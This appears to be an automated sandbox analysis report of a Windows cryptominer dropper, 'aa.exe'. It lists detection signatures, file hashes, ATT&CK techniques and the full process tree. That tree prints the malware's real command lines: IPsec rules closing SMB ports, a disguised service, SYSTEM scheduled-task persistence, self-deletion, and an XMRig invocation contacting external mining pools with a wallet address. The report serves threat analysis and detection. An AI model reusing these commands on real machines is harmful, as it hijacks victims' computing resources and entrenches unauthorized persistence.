Analysis

  • max time kernel
    151s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    07-05-2021 12:57

General

  • Target

    aa.exe

  • Size

    28.1MB

  • MD5

    8d9d7f5babe3ee15f2e93a4321fa45cf

  • SHA1

    689d53ae66e75e0b5715c0d04a7cab20e5390790

  • SHA256

    c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee

  • SHA512

    12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91

Score
10/10

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Detected Stratum cryptominer command

    Looks to be attempting to contact Stratum mining pool.

  • XMRig Miner Payload 7 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 2 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in Windows directory 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\aa.exe
    "C:\Users\Admin\AppData\Local\Temp\aa.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1360
    • C:\Windows\HWtlM\CSIYOE.exe
      C:\Windows\HWtlM\CSIYOE.exe
      2⤵
      • Modifies WinLogon for persistence
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Windows\end.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:572
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=ipsec_ply
          4⤵
            PID:300
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filterlist name=deny_pt
            4⤵
              PID:1208
            • C:\Windows\SysWOW64\netsh.exe
              netsh ipsec static add filterlist name=allow_pt
              4⤵
                PID:1480
              • C:\Windows\SysWOW64\netsh.exe
                netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
                4⤵
                  PID:1668
                • C:\Windows\SysWOW64\netsh.exe
                  netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
                  4⤵
                    PID:1744
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filteraction name=deny action=block
                    4⤵
                      PID:1708
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filteraction name=allow action=negotiate
                      4⤵
                        PID:1624
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
                        4⤵
                          PID:552
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
                          4⤵
                            PID:1256
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh ipsec static set policy name=ipsec_ply assign=y
                            4⤵
                              PID:668
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c ""C:\Windows\end.bat" "
                            3⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1112
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh ipsec static add policy name=ipsec_ply
                              4⤵
                                PID:1604
                              • C:\Windows\SysWOW64\netsh.exe
                                netsh ipsec static add filterlist name=deny_pt
                                4⤵
                                  PID:512
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh ipsec static add filterlist name=allow_pt
                                  4⤵
                                    PID:300
                                  • C:\Windows\SysWOW64\netsh.exe
                                    netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
                                    4⤵
                                      PID:572
                                    • C:\Windows\SysWOW64\netsh.exe
                                      netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
                                      4⤵
                                        PID:1704
                                      • C:\Windows\SysWOW64\netsh.exe
                                        netsh ipsec static add filteraction name=deny action=block
                                        4⤵
                                          PID:1612
                                        • C:\Windows\SysWOW64\netsh.exe
                                          netsh ipsec static add filteraction name=allow action=negotiate
                                          4⤵
                                            PID:1892
                                          • C:\Windows\SysWOW64\netsh.exe
                                            netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
                                            4⤵
                                              PID:316
                                            • C:\Windows\SysWOW64\netsh.exe
                                              netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
                                              4⤵
                                                PID:1360
                                              • C:\Windows\SysWOW64\netsh.exe
                                                netsh ipsec static set policy name=ipsec_ply assign=y
                                                4⤵
                                                  PID:616
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c ""C:\Windows\end.bat" "
                                                3⤵
                                                  PID:856
                                                  • C:\Windows\SysWOW64\netsh.exe
                                                    netsh ipsec static add policy name=ipsec_ply
                                                    4⤵
                                                      PID:1272
                                                    • C:\Windows\SysWOW64\netsh.exe
                                                      netsh ipsec static add filterlist name=deny_pt
                                                      4⤵
                                                        PID:1628
                                                      • C:\Windows\SysWOW64\netsh.exe
                                                        netsh ipsec static add filterlist name=allow_pt
                                                        4⤵
                                                          PID:468
                                                        • C:\Windows\SysWOW64\netsh.exe
                                                          netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=445 protocol=TCP
                                                          4⤵
                                                            PID:2004
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=deny_pt srcaddr=any dstaddr=ME dstport=139 protocol=TCP
                                                            4⤵
                                                              PID:1896
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filteraction name=deny action=block
                                                              4⤵
                                                                PID:1624
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filteraction name=allow action=negotiate
                                                                4⤵
                                                                  PID:888
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add rule name=deny policy=ipsec_ply filterlist=deny_pt filteraction=deny
                                                                  4⤵
                                                                    PID:656
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static add rule name=allow policy=ipsec_ply filterlist=allow_pt filteraction=allow psk="(@=P#$bV4$"
                                                                    4⤵
                                                                      PID:796
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static set policy name=ipsec_ply assign=y
                                                                      4⤵
                                                                        PID:1688
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c ""C:\Windows\end.bat" "
                                                                      3⤵
                                                                        PID:756
                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                        sc.exe Create "Application Layre Gateway Saervice" type= own type= interact start= demand DisplayName= "Can not be deledted" binPath= "cmd.exe /c start "C:\Windows\boy.exe"
                                                                        3⤵
                                                                          PID:2012
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /c ""C:\Windows\HWtlM\qdx.bat" "
                                                                          3⤵
                                                                            PID:864
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks.exe /create /TN "\Microsoft\Windows\UPnP\Services" /RU SYSTEM /TR "C:\Windows\HWtlM\CSIYOE.exe" /SC ONSTART
                                                                              4⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:588
                                                                          • C:\Windows\HWtlM\QW.exe
                                                                            "C:\Windows\HWtlM\QW.exe" -o stratum+tcp://dns.monerogb.com:6502 -o stratum+tcp://note.monerogb.com:8666 -o stratum+tcp://wk.sdffdasdfsdfaczxfwd53.org:5555 -u 44FaSvDWdKAB2R3n1XUZnjavNWwXEvyixVP8FhmccbNC6TGuCs4R937YWuoewbbSmMEsEJuYzqUwucVHhW73DwXo4ttSdNS -p x -k --donate-level=1
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:1672
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\aa.exe"
                                                                          2⤵
                                                                          • Deletes itself
                                                                          PID:1248

                                                                      Network

                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                      Execution

                                                                      Scheduled Task

                                                                      1
                                                                      T1053

                                                                      Persistence

                                                                      Winlogon Helper DLL

                                                                      1
                                                                      T1004

                                                                      New Service

                                                                      1
                                                                      T1050

                                                                      Scheduled Task

                                                                      1
                                                                      T1053

                                                                      Privilege Escalation

                                                                      New Service

                                                                      1
                                                                      T1050

                                                                      Scheduled Task

                                                                      1
                                                                      T1053

                                                                      Defense Evasion

                                                                      Modify Registry

                                                                      1
                                                                      T1112

                                                                      Discovery

                                                                      System Information Discovery

                                                                      1
                                                                      T1082

                                                                      Replay Monitor

                                                                      Loading Replay Monitor...

                                                                      Downloads

                                                                      • C:\Windows\HWtlM\CSIYOE.exe
                                                                        MD5

                                                                        8d9d7f5babe3ee15f2e93a4321fa45cf

                                                                        SHA1

                                                                        689d53ae66e75e0b5715c0d04a7cab20e5390790

                                                                        SHA256

                                                                        c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee

                                                                        SHA512

                                                                        12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91

                                                                      • C:\Windows\HWtlM\CSIYOE.exe
                                                                        MD5

                                                                        8d9d7f5babe3ee15f2e93a4321fa45cf

                                                                        SHA1

                                                                        689d53ae66e75e0b5715c0d04a7cab20e5390790

                                                                        SHA256

                                                                        c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee

                                                                        SHA512

                                                                        12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91

                                                                      • C:\Windows\HWtlM\QW.exe
                                                                        MD5

                                                                        90f9e1fdec81ccf508fc58f3d23156b5

                                                                        SHA1

                                                                        066783e092007d2bcd10e2bbf412269fb9260d3f

                                                                        SHA256

                                                                        d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018

                                                                        SHA512

                                                                        8463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95

                                                                      • C:\Windows\HWtlM\qdx.bat
                                                                        MD5

                                                                        3791074c6a9295ad1f6f28c793cd6df1

                                                                        SHA1

                                                                        6b963ab4513ca676340d8d18cc2dc6438c96c25d

                                                                        SHA256

                                                                        91b7a4a0dcb37175ef20673360e41645c7002f63e9ae76de0a3bc10f01393bb0

                                                                        SHA512

                                                                        00340700a537b5002162bebd1cba0cd7b5266b649e067b306db26426c0a4451786b98815fd1924d34971fffb1837aa09a4bdd5236368e50a0b47fc67453a7dd1

                                                                      • C:\Windows\HWtlM\tscl.html
                                                                        MD5

                                                                        6256004fb976b965e4112b9fbcb26f27

                                                                        SHA1

                                                                        2490faab9c9cc1d13b6a940797bdf646ef80c955

                                                                        SHA256

                                                                        0fd807b9f589470cddb98e3111d95e7ac136893e3c3ca6085d5482035de727b7

                                                                        SHA512

                                                                        4864d984a492010ce7d10777ef5e8b4fc10a340f54916600b36244e7072f06ab8ef8425a6236d063ef038cdf8aa41d2a77e479936c62cf221c2e28c45d252b27

                                                                      • C:\Windows\end.bat
                                                                        MD5

                                                                        c017d5f762ae5d67efb7d099b53cca58

                                                                        SHA1

                                                                        ab7f8553de7614251d76ce54aaee52f1a35e7ae6

                                                                        SHA256

                                                                        d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b

                                                                        SHA512

                                                                        856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78

                                                                      • C:\Windows\end.bat
                                                                        MD5

                                                                        c017d5f762ae5d67efb7d099b53cca58

                                                                        SHA1

                                                                        ab7f8553de7614251d76ce54aaee52f1a35e7ae6

                                                                        SHA256

                                                                        d8b897a896d21dfea7d901a57aa9cb5aa17a6bf02db1570a7d856680e3b3847b

                                                                        SHA512

                                                                        856dc8f6e94b1211ac84505e1e3350fda32d43583f9ec2e12fa7821c68376278220921cd2bffa9b562d6b0ed09f3dc9f674d830c7475e3d39def48e41563af78

                                                                      • \Windows\HWtlM\CSIYOE.exe
                                                                        MD5

                                                                        8d9d7f5babe3ee15f2e93a4321fa45cf

                                                                        SHA1

                                                                        689d53ae66e75e0b5715c0d04a7cab20e5390790

                                                                        SHA256

                                                                        c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee

                                                                        SHA512

                                                                        12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91

                                                                      • \Windows\HWtlM\CSIYOE.exe
                                                                        MD5

                                                                        8d9d7f5babe3ee15f2e93a4321fa45cf

                                                                        SHA1

                                                                        689d53ae66e75e0b5715c0d04a7cab20e5390790

                                                                        SHA256

                                                                        c4d49491a43ee26c28633a786a88812b293a3712414ddb5a7bcb81de026d73ee

                                                                        SHA512

                                                                        12e23c78465c65364b00df5685ea8b4e7a3b4ab2832bed18311b535a54ed48d0bd07c8b72474b43dc95893c6dea2261abeaf41c20683c923f43c4562f1bf3c91

                                                                      • \Windows\HWtlM\QW.exe
                                                                        MD5

                                                                        90f9e1fdec81ccf508fc58f3d23156b5

                                                                        SHA1

                                                                        066783e092007d2bcd10e2bbf412269fb9260d3f

                                                                        SHA256

                                                                        d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018

                                                                        SHA512

                                                                        8463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95

                                                                      • \Windows\HWtlM\QW.exe
                                                                        MD5

                                                                        90f9e1fdec81ccf508fc58f3d23156b5

                                                                        SHA1

                                                                        066783e092007d2bcd10e2bbf412269fb9260d3f

                                                                        SHA256

                                                                        d7b998957afba18e7f9c27b67692f1b26073250a6cf4187ad578e21925d16018

                                                                        SHA512

                                                                        8463ea66cbc997eadcba92a6cf91e19bfe73c31a023a99a5bab128e7485f6470b7a82b08b74d6e93a0e5e7f632920a586b20c3f7fb7cca3899942fa3fd80cc95

                                                                      • memory/300-101-0x0000000000000000-mapping.dmp
                                                                      • memory/300-69-0x0000000000000000-mapping.dmp
                                                                      • memory/316-126-0x0000000000000000-mapping.dmp
                                                                      • memory/468-100-0x0000000000000000-mapping.dmp
                                                                      • memory/512-97-0x0000000000000000-mapping.dmp
                                                                      • memory/552-83-0x0000000000000000-mapping.dmp
                                                                      • memory/572-104-0x0000000000000000-mapping.dmp
                                                                      • memory/572-67-0x0000000000000000-mapping.dmp
                                                                      • memory/588-136-0x0000000000000000-mapping.dmp
                                                                      • memory/616-130-0x0000000000000000-mapping.dmp
                                                                      • memory/656-118-0x0000000000000000-mapping.dmp
                                                                      • memory/668-87-0x0000000000000000-mapping.dmp
                                                                      • memory/756-132-0x0000000000000000-mapping.dmp
                                                                      • memory/796-120-0x0000000000000000-mapping.dmp
                                                                      • memory/856-90-0x0000000000000000-mapping.dmp
                                                                      • memory/864-134-0x0000000000000000-mapping.dmp
                                                                      • memory/888-116-0x0000000000000000-mapping.dmp
                                                                      • memory/1112-89-0x0000000000000000-mapping.dmp
                                                                      • memory/1164-62-0x0000000000000000-mapping.dmp
                                                                      • memory/1208-71-0x0000000000000000-mapping.dmp
                                                                      • memory/1248-66-0x0000000000000000-mapping.dmp
                                                                      • memory/1256-85-0x0000000000000000-mapping.dmp
                                                                      • memory/1272-93-0x0000000000000000-mapping.dmp
                                                                      • memory/1360-128-0x0000000000000000-mapping.dmp
                                                                      • memory/1360-59-0x00000000752B1000-0x00000000752B3000-memory.dmp
                                                                        Filesize

                                                                        8KB

                                                                      • memory/1480-73-0x0000000000000000-mapping.dmp
                                                                      • memory/1604-92-0x0000000000000000-mapping.dmp
                                                                      • memory/1612-112-0x0000000000000000-mapping.dmp
                                                                      • memory/1624-113-0x0000000000000000-mapping.dmp
                                                                      • memory/1624-81-0x0000000000000000-mapping.dmp
                                                                      • memory/1628-96-0x0000000000000000-mapping.dmp
                                                                      • memory/1668-75-0x0000000000000000-mapping.dmp
                                                                      • memory/1672-143-0x00000000003E0000-0x0000000000400000-memory.dmp
                                                                        Filesize

                                                                        128KB

                                                                      • memory/1672-142-0x0000000000280000-0x0000000000294000-memory.dmp
                                                                        Filesize

                                                                        80KB

                                                                      • memory/1672-139-0x0000000000000000-mapping.dmp
                                                                      • memory/1688-122-0x0000000000000000-mapping.dmp
                                                                      • memory/1704-109-0x0000000000000000-mapping.dmp
                                                                      • memory/1708-79-0x0000000000000000-mapping.dmp
                                                                      • memory/1744-77-0x0000000000000000-mapping.dmp
                                                                      • memory/1892-124-0x0000000000000000-mapping.dmp
                                                                      • memory/1896-108-0x0000000000000000-mapping.dmp
                                                                      • memory/2004-105-0x0000000000000000-mapping.dmp
                                                                      • memory/2012-133-0x0000000000000000-mapping.dmp